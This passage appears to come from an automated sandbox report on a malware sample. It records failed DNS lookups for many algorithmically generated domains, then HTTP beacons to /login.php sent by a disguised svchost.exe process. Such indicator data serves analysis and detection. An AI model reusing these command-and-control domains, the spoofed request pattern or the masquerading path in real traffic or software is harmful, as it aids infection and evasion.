                                                                                                                                                                                                          Sep 8, 2024 10:54:35.486362934 CEST1.1.1.1192.168.2.90xd147Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.491731882 CEST1.1.1.1192.168.2.90xaf3eName error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.493696928 CEST1.1.1.1192.168.2.90xb992Name error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.496946096 CEST1.1.1.1192.168.2.90xbcabName error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.498425961 CEST1.1.1.1192.168.2.90x6c1dName error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.499890089 CEST1.1.1.1192.168.2.90x96e4Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.505546093 CEST1.1.1.1192.168.2.90x9952Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.506608963 CEST1.1.1.1192.168.2.90xf421Name error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.524898052 CEST1.1.1.1192.168.2.90x5ec7Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.525413990 CEST1.1.1.1192.168.2.90xd9eeName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.527143002 CEST1.1.1.1192.168.2.90x25bdName error (3)qebyqig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.528670073 CEST1.1.1.1192.168.2.90x3f9aName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530653954 CEST1.1.1.1192.168.2.90x5782Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531142950 CEST1.1.1.1192.168.2.90x8431Name error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531155109 CEST1.1.1.1192.168.2.90x80fName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531999111 CEST1.1.1.1192.168.2.90x32eeName error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533159971 CEST1.1.1.1192.168.2.90x94efName error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533365965 CEST1.1.1.1192.168.2.90xe74Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534276962 CEST1.1.1.1192.168.2.90x84f4Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.537197113 CEST1.1.1.1192.168.2.90x3654Name error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.538096905 CEST1.1.1.1192.168.2.90xa16Name error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.538110018 CEST1.1.1.1192.168.2.90x8145Name error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.540633917 CEST1.1.1.1192.168.2.90xc4caName error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.540761948 CEST1.1.1.1192.168.2.90xe9e3Name error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.541249990 CEST1.1.1.1192.168.2.90x3dc7Name error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.541286945 CEST1.1.1.1192.168.2.90xdc10Name error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.542247057 CEST1.1.1.1192.168.2.90x53a6Name error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.545598030 CEST1.1.1.1192.168.2.90xc42aName error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.545912981 CEST1.1.1.1192.168.2.90x6e0fName error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546195030 CEST1.1.1.1192.168.2.90xa7aName error (3)gaqyres.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546262026 CEST1.1.1.1192.168.2.90xd6c5Name error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546396971 CEST1.1.1.1192.168.2.90xb0daName error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546844006 CEST1.1.1.1192.168.2.90xb48aName error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.550204992 CEST1.1.1.1192.168.2.90x5ffeName error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.551814079 CEST1.1.1.1192.168.2.90x53a6Name error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.555684090 CEST1.1.1.1192.168.2.90xecb3Name error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.564876080 CEST1.1.1.1192.168.2.90xa122Name error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566556931 CEST1.1.1.1192.168.2.90x39e8Name error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566654921 CEST1.1.1.1192.168.2.90xa459Name error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566927910 CEST1.1.1.1192.168.2.90x8e2Name error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.572550058 CEST1.1.1.1192.168.2.90xd034Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.675026894 CEST1.1.1.1192.168.2.90x741cName error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346307993 CEST1.1.1.1192.168.2.90x1189Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346710920 CEST1.1.1.1192.168.2.90xcc1cName error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346733093 CEST1.1.1.1192.168.2.90x7618Name error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346787930 CEST1.1.1.1192.168.2.90xfeeName error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347024918 CEST1.1.1.1192.168.2.90x8e91Name error (3)gaqyres.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347687006 CEST1.1.1.1192.168.2.90x89e1Name error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347888947 CEST1.1.1.1192.168.2.90xaf18Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.352360964 CEST1.1.1.1192.168.2.90x79cfName error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.354501009 CEST1.1.1.1192.168.2.90x1e01Name error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.354808092 CEST1.1.1.1192.168.2.90xf22bName error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.393138885 CEST1.1.1.1192.168.2.90x289aName error (3)gaqykoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.406789064 CEST1.1.1.1192.168.2.90x5be1Name error (3)lyxyfan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.407830954 CEST1.1.1.1192.168.2.90xc0b2Name error (3)pufyxyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.410587072 CEST1.1.1.1192.168.2.90xa2f9Name error (3)qeqyqul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.438687086 CEST1.1.1.1192.168.2.90x5ea9Name error (3)lyrywoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.443908930 CEST1.1.1.1192.168.2.90x97b6Name error (3)pumyjip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.485963106 CEST1.1.1.1192.168.2.90x21f3Name error (3)pupyteg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.493757963 CEST1.1.1.1192.168.2.90x52fdName error (3)qexyfag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.497761011 CEST1.1.1.1192.168.2.90x3b9Name error (3)puzydog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.498976946 CEST1.1.1.1192.168.2.90xf344Name error (3)vofypuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.503925085 CEST1.1.1.1192.168.2.90x726eName error (3)ganyhus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.507010937 CEST1.1.1.1192.168.2.90xb958Name error (3)gahycuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.516465902 CEST1.1.1.1192.168.2.90x246eName error (3)vowyqik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.525201082 CEST1.1.1.1192.168.2.90x9a0dName error (3)lyvygyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.527888060 CEST1.1.1.1192.168.2.90xc5a3Name error (3)pujycil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528104067 CEST1.1.1.1192.168.2.90x885cName error (3)lyxynej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528492928 CEST1.1.1.1192.168.2.90xb2ceName error (3)vopyrem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528599977 CEST1.1.1.1192.168.2.90x9649Name error (3)qetyraq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537563086 CEST1.1.1.1192.168.2.90x5293Name error (3)gaqyqiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537590027 CEST1.1.1.1192.168.2.90xa00cName error (3)qekyvol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539391994 CEST1.1.1.1192.168.2.90xf89bName error (3)lykyvor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.551279068 CEST1.1.1.1192.168.2.90x42ddName error (3)lysytyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.556535959 CEST1.1.1.1192.168.2.90x201cName error (3)qeqykop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557203054 CEST1.1.1.1192.168.2.90xaa9dName error (3)lygyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557756901 CEST1.1.1.1192.168.2.90x6934Name error (3)vonyjuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558141947 CEST1.1.1.1192.168.2.90xf84fName error (3)puvygyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558645010 CEST1.1.1.1192.168.2.90xaabaName error (3)galyvaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558659077 CEST1.1.1.1192.168.2.90xe4fbName error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.563307047 CEST1.1.1.1192.168.2.90x66b5Name error (3)gacyfeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.567322969 CEST1.1.1.1192.168.2.90xaa57Name error (3)qebyhuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.569783926 CEST1.1.1.1192.168.2.90x69b3Name error (3)vocygef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576924086 CEST1.1.1.1192.168.2.90x57cdName error (3)qedytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.584055901 CEST1.1.1.1192.168.2.90xf28cName error (3)gadypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.588280916 CEST1.1.1.1192.168.2.90xa3ceName error (3)volybak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590027094 CEST1.1.1.1192.168.2.90xacbcName error (3)vofyzyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590759993 CEST1.1.1.1192.168.2.90x4c84Name error (3)gatyrah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.592622995 CEST1.1.1.1192.168.2.90xbbdeName error (3)purywoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.598552942 CEST1.1.1.1192.168.2.90xfd01Name error (3)qegyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.604491949 CEST1.1.1.1192.168.2.90x9b9eName error (3)vojycit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.606081009 CEST1.1.1.1192.168.2.90xa4eaName error (3)lymyjix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          • www.google.comuser-agent:
                                                                                                                                                                                                            • qegyhig.com
                                                                                                                                                                                                            • lysyvan.com
                                                                                                                                                                                                            • gahyqah.com
                                                                                                                                                                                                            • vocyzit.com
                                                                                                                                                                                                            • vonypom.com
                                                                                                                                                                                                            • puzylyp.com
                                                                                                                                                                                                            • vojyqem.com
                                                                                                                                                                                                            • qetyfuv.com
                                                                                                                                                                                                            • lymyxid.com
                                                                                                                                                                                                            • lyvyxor.com
                                                                                                                                                                                                            • galyqaz.com
                                                                                                                                                                                                            • gatyfus.com
                                                                                                                                                                                                            • lysyfyj.com
                                                                                                                                                                                                            • gadyniw.com
                                                                                                                                                                                                            • www.gahyqah.com
                                                                                                                                                                                                            • pupydeq.com
                                                                                                                                                                                                            • pupycag.com
                                                                                                                                                                                                            • lyrysor.com
                                                                                                                                                                                                            • 106.15.36.143:8001
                                                                                                                                                                                                            • galynuh.com
                                                                                                                                                                                                            • qegyval.com
                                                                                                                                                                                                            • gadyciz.com
                                                                                                                                                                                                            • lyxynyx.com
                                                                                                                                                                                                            • qexyhuv.com
                                                                                                                                                                                                            • vofycot.com
                                                                                                                                                                                                            • ww25.lyxynyx.com
                                                                                                                                                                                                            • ww16.vofycot.com
                                                                                                                                                                                                            • qetyhyg.com
                                                                                                                                                                                                            • gatyhub.com
                                                                                                                                                                                                            • lygyvuj.com
                                                                                                                                                                                                            • gahyhiz.com
                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.949707188.114.96.3801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.369887114 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.077415943 CEST622INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B9lcaxXlnk%2BOz9EOM2NSYDXsyHZhWHInGSP1wspaAdXwe%2FPr9zYNyWymAZyjgYEKuw%2FlbZUy%2FtsKoDDMws14EpL1WjNkaqd2cnqdVjA3f3VwHep5Gv%2BEFPydmRtOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb4055cb843e7-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.209353924 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.990000010 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.784790039 CEST793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkmLgFDR%2BAslHr3zi02MzrjIe4MixGHHNVn3xdTh3QBvmXR5QrZbluHr%2Fp4MIzRgVf%2B7FjW4rh4hBQWl9Tc8WNRCXyL5vXO2t7r5P%2BLf1b4SEMG7UudyTaz0vafvUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb4137c9b43e7-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.949708162.255.119.102801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.426225901 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.160356998 CEST303INHTTP/1.1 302 Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                          X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                          Server: namecheap-nginx
                                                                                                                                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                          Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.94970944.221.84.105801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.427041054 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vocyzit.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.900964022 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=163736594642e010dac643a03a19fdf5|8.46.123.33|1725785554|1725785554|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.94971018.208.156.248801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.479922056 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vonypom.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.935336113 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=e8200e7f93821a3a5b7931eb0293e52a|8.46.123.33|1725785554|1725785554|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.9497113.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.543483973 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.9497123.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.563905954 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.94971344.221.84.105801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.741276026 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyfuv.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.218072891 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
